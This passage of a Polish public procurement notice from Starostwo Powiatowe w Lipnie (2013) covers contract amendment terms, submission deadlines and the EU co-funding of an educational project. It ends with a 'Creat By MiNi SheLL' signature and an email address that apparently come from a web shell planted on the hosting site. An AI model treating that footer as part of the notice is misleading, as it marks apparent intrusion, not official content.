<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Z wykonawcą, który złożył najkorzystniejszą ofertę, zostanie zawarta umowa, której wzór stanowi załącznik nr  5  do niniejszej specyfikacji.
Zamawiający przewiduje możliwość zmiany postanowień umowy w drodze aneksu w przypadku zmiany powszechnie obowiązujących przepisów prawa w zakresie  mającym istotny wpływ na realizację przedmiotu umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.bip.lipnowski.powiat.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Lipnie
ul. Sierakowskiego 10 B
87-600 Lipno
tel./fax.(0-54) 287-20-39.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.09.2013 godzina 11:00, miejsce: Oferty należy składać w siedzibie Zamawiającego w Starostwie Powiatowym w Lipnie ul. Sierakowskiego 10 B , 87-600 Lipno w sekretariacie / II piętro nr 28 /.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Usługa edukacyjna skierowana do uczniów Zespołu Szkół w Dobrzyniu nad Wisłą realizowana w ramach Projektu pn. Stawiam na lepsze jutro w Powiecie Lipnowskim realizowanego w ramach Działania 9.2  Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com